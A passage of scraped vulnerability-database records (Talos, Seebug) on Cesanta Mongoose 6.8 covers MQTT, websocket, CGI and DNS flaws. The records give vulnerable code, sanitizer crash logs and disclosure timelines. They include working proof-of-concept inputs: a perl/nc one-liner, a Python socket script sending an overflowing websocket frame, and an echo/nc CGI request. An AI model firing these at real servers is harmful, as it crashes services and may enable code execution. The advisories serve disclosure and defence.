mg_mqtt_next_subscribe_topic(msg, &topic, &qos, pos)) != -1;) {\n qoss[qoss_len++] = qos; [2]\n \n\nIn the above code, an array of 512 bytes is allocated at [1]. Then, in a for loop at [2] the QOS value is stored inside that buffer and an index is incremented. 
No check is present to make sure that `qoss_len` doesn\u2019t exceed the array size, so a SUBSCRIBE with more than 512 subscriptions will overflow the array and write past it, corrupting the stack frame.\n\nThis vulnerability can be triggered by running the supplied proof of concept against the sample `mqtt_broker` application supplied with the library.\n\n### Crash Information\n \n \n Address Sanitizer output:\n \n ==120239==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffb2d0 at pc 0x00000051c985 bp 0x7fffffffaff0 sp \n 0x7fffffffafe8\n WRITE of size 1 at 0x7fffffffb2d0 thread T0\n #0 0x51c984 in mg_mqtt_broker_handle_subscribe /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:10031\n #1 0x51c984 in mg_mqtt_broker /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:10112\n #2 0x51c984 in ?? ??:0\n #3 0x513e76 in mqtt_handler /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:9701\n #4 0x513e76 in ?? ??:0\n #5 0x4fa245 in mg_call /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:2051\n #6 0x4fa245 in ?? ??:0\n #7 0x4fe437 in mg_recv_common /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:2502\n #8 0x4fe437 in ?? ??:0\n #9 0x50a307 in mg_if_recv_tcp_cb /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:2506\n #10 0x50a307 in mg_handle_tcp_read /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:3372\n #11 0x50a307 in mg_mgr_handle_conn /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:3497\n #12 0x50a307 in ?? ??:0\n #13 0x50e9c8 in mg_socket_if_poll /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:3690\n #14 0x50e9c8 in ?? ??:0\n #15 0x4fbb65 in mg_mgr_poll /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:2232\n #16 0x4fbb65 in ?? ??:0\n #17 0x4eaffa in main /home/user/mongoose/examples/mqtt_broker/mqtt_broker.c:43\n #18 0x4eaffa in ?? ??:0\n #19 0x7ffff683882f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291\n #20 0x7ffff683882f in ?? 
??:0\n #21 0x419848 in _start ??:?\n #22 0x419848 in ?? ??:0\n \n \n Address 0x7fffffffb2d0 is located in stack of thread T0 at offset 720 in frame\n #0 0x51c61f in mg_mqtt_broker /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:10093\n #1 0x51c61f in ?? ??:0\n \n This frame has 3 object(s):\n [32, 132) \u2018buf.i\u2019\n [176, 184) \u2018p.i\u2019\n [208, 720) \u2018qoss.i\u2019 <== Memory access at offset 720 overflows this variable\n HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\n (longjmp and C++ exceptions _are_ supported)\n SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x51c984)\n 
==120239==ABORTING\n\n### Exploit Proof-of-Concept\n\nperl -e \u2018print \u201c\\x80\\xff\\x0f\u201d . \u201c\\x00\\x00\\x00\\x01a\\x02\\x00\u201dx400 \u2018 | nc \n\n### Timeline\n\n2017-08-31 - Vendor Disclosure \n2017-10-30 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-31T00:00:00", "type": "talos", "title": "Cesanta Mongoose MQTT SUBSCRIBE Multiple Topics Remote Code Execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2894"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0401", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0401", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T11:55:42", "description": "### Summary\r\nAn exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow leading to a heap buffer overflow, resulting in denial of service and potential remote code execution. 
An attacker needs to send a specially crafted websocket packet over the network to trigger this vulnerability.

### Tested Versions
Cesanta Mongoose 6.8

### Product URLs
https://cesanta.com/

### CVSSv3 Score
8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

### CWE
CWE-190: Integer Overflow or Wraparound

### Details
Mongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. Its HTTP implementation includes the upgrade support required for websocket applications. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.

After the initial websocket handshake, while parsing a websocket packet, an integer overflow involving the header length and packet size can occur. Insufficient checks after the potential overflow can later lead to a very large memory overwrite, which can result in heap memory corruption, a process crash and potentially remote code execution.

The function `mg_deliver_websocket_data` is responsible for parsing the websocket packet. The relevant code is:
```c
uint64_t i, data_len = 0, frame_len = 0, buf_len = nc->recv_mbuf.len, len,   /* [1] */
         mask_len = 0, header_len = 0;
...
if (buf_len >= 2) {
  ...
} else if (buf_len >= 10 + mask_len) {
  header_len = 10 + mask_len;                                                 /* [2] */
  data_len = (((uint64_t) ntohl(*(uint32_t *) &buf[2])) << 32) +             /* [3] */
             ntohl(*(uint32_t *) &buf[6]);
}

frame_len = header_len + data_len;                                            /* [4] */
ok = frame_len > 0 && frame_len <= buf_len;                                   /* [5] */

if (ok) {
  ...
  /* Apply mask if necessary */
  if (mask_len > 0) {
    for (i = 0; i < data_len; i++) {
      buf[i + header_len] ^= (buf + header_len - mask_len)[i % 4];           /* [6] */
    }
  }
}
```

In the above code, we can see at [1] the local variables `frame_len`, `header_len` and `data_len` being declared as 64-bit unsigned integers. 
At [2], the header length is calculated, since the websocket protocol specifies variable-length headers. At [3], 8 bytes from the packet are used as `data_len` directly. At [4], the total `frame_len` is calculated, and at [5] basic sanity checks are performed. If everything is ok and the packet has the mask bit set, at [6] all the data in the buffer is XORed with the 4-byte mask.

The insufficient check at [5] can allow an integer overflow to pass undetected. If `data_len` is a very large value, adding `header_len` to it can wrap around, resulting in a small `frame_len` value. The small `frame_len` passes the `frame_len <= buf_len` check, while `data_len` is still huge and bigger than the actual buffer size. This results in a large heap overflow at [6], as the for loop is bounded by `data_len` only.

This causes the process to crash, leading to denial of service and in some cases potentially to remote code execution.

### Crash Information
```
Address sanitizer output:

==88164==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000006380 at pc 0x00000051abae bp 0x7fffffffb490 sp 0x7fffffffb488
READ of size 1 at 0x619000006380 thread T0
    #0 0x51abad in mg_deliver_websocket_data /home/user/mongoose/examples/websocket_chat/../../mongoose.c:8866
    #1 0x51abad in ?? ??:0
    #2 0x5128d4 in mg_ws_handler /home/user/mongoose/examples/websocket_chat/../../mongoose.c:9045 (discriminator 1)
    #3 0x5128d4 in ?? ??:0
    #4 0x4f9de6 in mg_call /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2051
    #5 0x4f9de6 in ?? ??:0
    #6 0x4fdcf9 in mg_recv_common /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2502
    #7 0x4fdcf9 in ?? ??:0
    #8 0x506603 in mg_if_recv_tcp_cb /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2506
    #9 0x506603 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3372
    #10 0x506603 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497
    #11 0x506603 in ?? ??:0
    #12 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690
    #13 0x509dd8 in ?? ??:0
    #14 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232
    #15 0x4fb695 in ?? ??:0
    #16 0x4ea65a in main /home/user/mongoose/examples/websocket_chat/websocket_chat.c:78
    #17 0x4ea65a in ?? ??:0
    #18 0x7ffff6ee582f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
    #19 0x7ffff6ee582f in ?? ??:0
    #20 0x418e58 in _start ??:?
    #21 0x418e58 in ?? ??:0

0x619000006380 is located 0 bytes to the right of 1024-byte region [0x619000005f80,0x619000006380)
allocated by thread T0 here:
    #0 0x4b8f88 in __interceptor_malloc ??:?
    #1 0x4b8f88 in ?? ??:0
    #2 0x506453 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3336 (discriminator 1)
    #3 0x506453 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497 (discriminator 1)
    #4 0x506453 in ?? ??:0
    #5 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690
    #6 0x509dd8 in ?? ??:0
    #7 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232
    #8 0x4fb695 in ?? ??:0
    #4 0x60200000efef (<unknown module>)

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/mongoose/examples/websocket_chat/websocket_chat+0x51abad)
Shadow bytes around the buggy address:
  0x0c327fff8c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff8c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff8c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff8c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c327fff8c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c327fff8c70:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c327fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c327fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c327fff8ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c327fff8cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c327fff8cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes): as in the AddressSanitizer legend printed above
==88164==ABORTING
```

### Timeline
* 2017-08-30 - Vendor Disclosure
* 2017-10-31 - Public Release

Record metadata:
* Type: seebug (bulletin family: exploit)
* Title: Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability (CVE-2017-2921)
* CVE: CVE-2017-2921
* Published: 2017-11-08; modified: 2017-11-08
* CVSSv3 / CVSSv2: not given in the record
* Reference: https://www.seebug.org/vuldb/ssvid-96808
* ID: SSV:96808
* Source data (the proof-of-concept script published with the record; it is a Python 2 script, kept as published):

```python
import socket
import struct
import sys

# Only the HTTP "Upgrade: websocket" header matters below; the GET request
# itself was copied verbatim from Wikipedia.
http_upgrade = ('GET /chat HTTP/1.1\r\n'
                'Host: server.example.com\r\n'
                'Upgrade: websocket\r\n'
                'Connection: Upgrade\r\n'
                'Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\r\n'
                'Sec-WebSocket-Protocol: chat, superchat\r\n'
                'Sec-WebSocket-Version: 13\r\n'
                'Origin: http://example.com\r\n\r\n')

payload = "\x00"            # FIN flag doesn't matter, opcode doesn't matter
payload += chr(0x80 | 127)  # mask is set; payload len of 127 means the next 64 bits are the actual payload len
payload_len = 0xffffffffffffffff - 12  # actual payload len
payload += struct.pack("!Q", payload_len)
masking_key = 0  # masking key can be anything, and would need to be a specific value in a real exploit
payload += struct.pack("I", masking_key)
payload += "A" * 40  # garbage to pad the packet

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], int(sys.argv[2])))
s.send(http_upgrade)
print s.recv(1024)
s.send(payload)
print s.recv(1024)
```

* Source reference: https://www.seebug.org/vuldb/ssvid-96808
* CVSS (record): score 0.0, vector NONE

Seebug record (last seen 2017-11-19T13:06:31):

### Summary
An exploitable use-after-free vulnerability exists in the HTTP server implementation of Cesanta Mongoose 6.8. An ordinary HTTP POST request with a CGI target can cause a reuse of a previously freed pointer, potentially resulting in remote code execution. 
An attacker needs to send this HTTP request over the network to trigger this vulnerability.

### Tested Versions
Cesanta Mongoose 6.8

### Product URLs
https://cesanta.com/

### CVSSv3 Score
9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

### CWE
CWE-416: Use After Free

### Details
Mongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.

While parsing a specific type of POST request that targets a CGI script, a use-after-free vulnerability is triggered if the library is compiled with CGI support, which is the default. During the initial parsing, a structure of type `mg_connection` is allocated in the function `mg_create_connection_base`. Then, while working on a reply, and since this is a CGI request (the target of the request only needs to end with the configured CGI extension, ".cgi" by default), a CGI handler is invoked in the function `mg_send_http_file`:
```c
} else if (is_cgi) {
#if MG_ENABLE_HTTP_CGI
  mg_handle_cgi(nc, index_file ? index_file : path, path_info, hm, opts);
#else
```

In the function `mg_handle_cgi` a new connection structure is allocated and the previous one is attached to it:
```c
  struct mg_connection *cgi_nc =
      mg_add_sock(nc->mgr, fds[0], mg_cgi_ev_handler);              /* [1] */
  struct mg_http_proto_data *cgi_pd = mg_http_get_proto_data(nc);
  cgi_pd->cgi.cgi_nc = cgi_nc;
  cgi_pd->cgi.cgi_nc->user_data = nc;                               /* [2] */
  nc->flags |= MG_F_USER_1;
```

In the above code, at [1] a new connection structure is created, and at [2] the old `nc` is stored in its `user_data` field. Since the initial client connection is deemed done, it is cleaned up and the first `mg_connection` structure is freed by calling `mg_close_conn` in the function `mg_socket_if_poll`. This leaves the `cgi_pd->cgi.cgi_nc->user_data` pointer set at [2] pointing to freed memory. Then, when the actual CGI event handler function `mg_cgi_ev_handler` executes, this freed data is accessed in different places depending on the event:
```c
static void mg_cgi_ev_handler(struct mg_connection *cgi_nc, int ev,
                              void *ev_data) {
  struct mg_connection *nc = (struct mg_connection *) cgi_nc->user_data;  /* [3] */
...
    case MG_EV_CLOSE:
      mg_http_free_proto_data_cgi(&mg_http_get_proto_data(nc)->cgi);     /* [4] */
      nc->flags |= MG_F_SEND_AND_CLOSE;
      break;
```

In the above code, at [3] the pointer to the original connection structure is retrieved (which at this time points to freed memory) and is dereferenced at [4], which ultimately leads to reads and writes over unallocated memory. If a second request happens at the right time, this freed memory might contain different data or point to other structures, leading to a server crash and potential remote code execution with multiple carefully controlled POST requests.

This vulnerability can be demonstrated via the example web server application supplied with the library. 
Since the server may not immediately crash, the vulnerability can be observed by running the server under a memory debugger such as Valgrind or AddressSanitizer.

### Crash Information
```
Valgrind output:

==87342== Memcheck, a memory error detector
==87342== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==87342== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
==87342== Command: ./simplest_web_server
==87342== 
==87342== Invalid read of size 8
==87342==    at 0x40BD62: mg_http_get_proto_data (mongoose.c:5054)
==87342==    by 0x4138DD: mg_cgi_ev_handler (mongoose.c:8249)
==87342==    by 0x406FD9: mg_call (mongoose.c:2051)
==87342==    by 0x407318: mg_close_conn (mongoose.c:2108)
==87342==    by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342==  Address 0x5421728 is 136 bytes inside a block of size 208 free'd
==87342==    at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==87342==    by 0x407289: mg_destroy_conn (mongoose.c:2101)
==87342==    by 0x407329: mg_close_conn (mongoose.c:2109)
==87342==    by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342==  Block was alloc'd at
==87342==    at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==87342==    by 0x4078F2: mg_create_connection_base (mongoose.c:2303)
==87342==    by 0x4079DC: mg_create_connection (mongoose.c:2328)
==87342==    by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)
==87342==    by 0x409A9F: mg_accept_conn (mongoose.c:3202)
==87342==    by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)
==87342==    by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342== 
==87342== Invalid write of size 8
==87342==    at 0x40BD84: mg_http_get_proto_data (mongoose.c:5055)
==87342==    by 0x4138DD: mg_cgi_ev_handler (mongoose.c:8249)
==87342==    by 0x406FD9: mg_call (mongoose.c:2051)
==87342==    by 0x407318: mg_close_conn (mongoose.c:2108)
==87342==    by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342==  Address 0x5421728 is 136 bytes inside a block of size 208 free'd
==87342==    at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==87342==    by 0x407289: mg_destroy_conn (mongoose.c:2101)
==87342==    by 0x407329: mg_close_conn (mongoose.c:2109)
==87342==    by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342==  Block was alloc'd at
==87342==    at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==87342==    by 0x4078F2: mg_create_connection_base (mongoose.c:2303)
==87342==    by 0x4079DC: mg_create_connection (mongoose.c:2328)
==87342==    by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)
==87342==    by 0x409A9F: mg_accept_conn (mongoose.c:3202)
==87342==    by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)
==87342==    by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342== 
==87342== Invalid write of size 8
==87342==    at 0x40BD8F: mg_http_get_proto_data (mongoose.c:5056)
==87342==    by 0x4138DD: mg_cgi_ev_handler (mongoose.c:8249)
==87342==    by 0x406FD9: mg_call (mongoose.c:2051)
==87342==    by 0x407318: mg_close_conn (mongoose.c:2108)
==87342==    by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342==  Address 0x5421730 is 144 bytes inside a block of size 208 free'd
==87342==    at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==87342==    by 0x407289: mg_destroy_conn (mongoose.c:2101)
==87342==    by 0x407329: mg_close_conn (mongoose.c:2109)
==87342==    by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342==  Block was alloc'd at
==87342==    at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==87342==    by 0x4078F2: mg_create_connection_base (mongoose.c:2303)
==87342==    by 0x4079DC: mg_create_connection (mongoose.c:2328)
==87342==    by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)
==87342==    by 0x409A9F: mg_accept_conn (mongoose.c:3202)
==87342==    by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)
==87342==    by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342== 
==87342== Invalid read of size 8
==87342==    at 0x40BD9E: mg_http_get_proto_data (mongoose.c:5059)
==87342==    by 0x4138DD: mg_cgi_ev_handler (mongoose.c:8249)
==87342==    by 0x406FD9: mg_call (mongoose.c:2051)
==87342==    by 0x407318: mg_close_conn (mongoose.c:2108)
==87342==    by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342==  Address 0x5421728 is 136 bytes inside a block of size 208 free'd
==87342==    at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==87342==    by 0x407289: mg_destroy_conn (mongoose.c:2101)
==87342==    by 0x407329: mg_close_conn (mongoose.c:2109)
==87342==    by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342==  Block was alloc'd at
==87342==    at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==87342==    by 0x4078F2: mg_create_connection_base (mongoose.c:2303)
==87342==    by 0x4079DC: mg_create_connection (mongoose.c:2328)
==87342==    by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)
==87342==    by 0x409A9F: mg_accept_conn (mongoose.c:3202)
==87342==    by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)
==87342==    by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342== 
==87342== Invalid read of size 8
==87342==    at 0x4138F1: mg_cgi_ev_handler (mongoose.c:8250)
==87342==    by 0x406FD9: mg_call (mongoose.c:2051)
==87342==    by 0x407318: mg_close_conn (mongoose.c:2108)
==87342==    by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342==  Address 0x5421768 is 200 bytes inside a block of size 208 free'd
==87342==    at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==87342==    by 0x407289: mg_destroy_conn (mongoose.c:2101)
==87342==    by 0x407329: mg_close_conn (mongoose.c:2109)
==87342==    by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342==  Block was alloc'd at
==87342==    at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==87342==    by 0x4078F2: mg_create_connection_base (mongoose.c:2303)
==87342==    by 0x4079DC: mg_create_connection (mongoose.c:2328)
==87342==    by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)
==87342==    by 0x409A9F: mg_accept_conn (mongoose.c:3202)
==87342==    by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)
==87342==    by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342== 
==87342== Invalid write of size 8
==87342==    at 0x413905: mg_cgi_ev_handler (mongoose.c:8250)
==87342==    by 0x406FD9: mg_call (mongoose.c:2051)
==87342==    by 0x407318: mg_close_conn (mongoose.c:2108)
==87342==    by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342==  Address 0x5421768 is 200 bytes inside a block of size 208 free'd
==87342==    at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==87342==    by 0x407289: mg_destroy_conn (mongoose.c:2101)
==87342==    by 0x407329: mg_close_conn (mongoose.c:2109)
==87342==    by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342==  Block was alloc'd at
==87342==    at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==87342==    by 0x4078F2: mg_create_connection_base (mongoose.c:2303)
==87342==    by 0x4079DC: mg_create_connection (mongoose.c:2328)
==87342==    by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)
==87342==    by 0x409A9F: mg_accept_conn (mongoose.c:3202)
==87342==    by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)
==87342==    by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342== 
==87355== 
==87355== HEAP SUMMARY:
==87355==     in use at exit: 1,656 bytes in 9 blocks
==87355==   total heap usage: 11 allocs, 2 frees, 3,704 bytes allocated
==87355== 
==87355== LEAK SUMMARY:
==87355==    definitely lost: 0 bytes in 0 blocks
==87355==    indirectly lost: 0 bytes in 0 blocks
==87355==      possibly lost: 0 bytes in 0 blocks
==87355==    still reachable: 1,656 bytes in 9 blocks
==87355==         suppressed: 0 bytes in 0 blocks
==87355== Rerun with --leak-check=full to see details of leaked memory
==87355== 
==87355== For counts of detected and suppressed errors, rerun with: -v
==87355== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)
==87342== 
==87342== Process terminating with default action of signal 2 (SIGINT)
==87342==    at 0x5154573: __select_nocancel (syscall-template.S:84)
==87342==    by 0x40AB75: mg_socket_if_poll (mongoose.c:3657)
==87342==    by 0x407729: mg_mgr_poll (mongoose.c:2232)
==87342==    by 0x4020C2: main (simplest_web_server.c:33)
==87342== 
==87342== HEAP SUMMARY:
==87342==     in use at exit: 416 bytes in 6 blocks
==87342==   total heap usage: 14 allocs, 8 frees, 5,008 bytes allocated
==87342== 
==87342== LEAK SUMMARY:
==87342==    definitely lost: 72 bytes in 1 blocks
==87342==    indirectly lost: 0 bytes in 0 blocks
==87342==      possibly lost: 0 bytes in 0 blocks
==87342==    still reachable: 344 bytes in 5 blocks
==87342==         suppressed: 0 bytes in 0 blocks
==87342== Rerun with --leak-check=full to see details of leaked memory
==87342== 
==87342== For counts of detected and suppressed errors, rerun with: -v
==87342== ERROR SUMMARY: 6 errors from 6 contexts (suppressed: 0 from 0)
```

### Timeline
* 2017-08-30 - Vendor Disclosure
* 2017-10-31 - Public Release

Record metadata:
* Type: seebug (bulletin family: exploit)
* Title: Cesanta Mongoose HTTP Server CGI Remote Code Execution Vulnerability (CVE-2017-2891)
* CVE: CVE-2017-2891
* Published: 2017-11-09; modified: 2017-11-09
* CVSSv3 / CVSSv2: not given in the record
* Reference: https://www.seebug.org/vuldb/ssvid-96834
* ID: SSV:96834
* Source data (the proof-of-concept command published with the record):

```sh
echo -ne "POST /a.cgi HTTP/1.1\r\n\r\n" | nc localhost 8000
```

* Source reference (sourceHref):
https://www.seebug.org/vuldb/ssvid-96834
* CVSS (record): score 0.0, vector NONE

Seebug record (last seen 2017-11-19T13:05:45):

### Summary
An infinite loop programming error exists in the DNS server functionality of the Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop, resulting in high CPU usage and denial of service. An attacker can send a packet over the network to trigger this vulnerability.

### Tested Versions
Cesanta Mongoose 6.8

### Product URLs
https://cesanta.com/

### CVSSv3 Score
7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

### CWE
CWE-835: Loop with Unreachable Exit Condition ('Infinite Loop')

### Details
Mongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, DNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.

In a DNS request packet, a name can be compressed to save space. The compression in question relies on pointers to parts of the domain name already present in the packet. When decompressing the names, the DNS server software must look up those pointers and substitute them accordingly.

In the Mongoose library, the function `mg_dns_uncompress_name` is responsible for decompressing names, and a special case for pointers is handled:
```c
while ((chunk_len = *data++)) {                                   /* [3] */
  int leeway = dst_len - (dst - old_dst);
  if (data >= end) {
    return 0;
  }

  if (chunk_len & 0xc0) {                                         /* [1] */
    uint16_t off = (data[-1] & (~0xc0)) << 8 | data[0];
    if (off >= msg->pkt.len) {
      return 0;
    }
    data = (unsigned char *) msg->pkt.p + off;                    /* [2] */
    continue;
  }
```

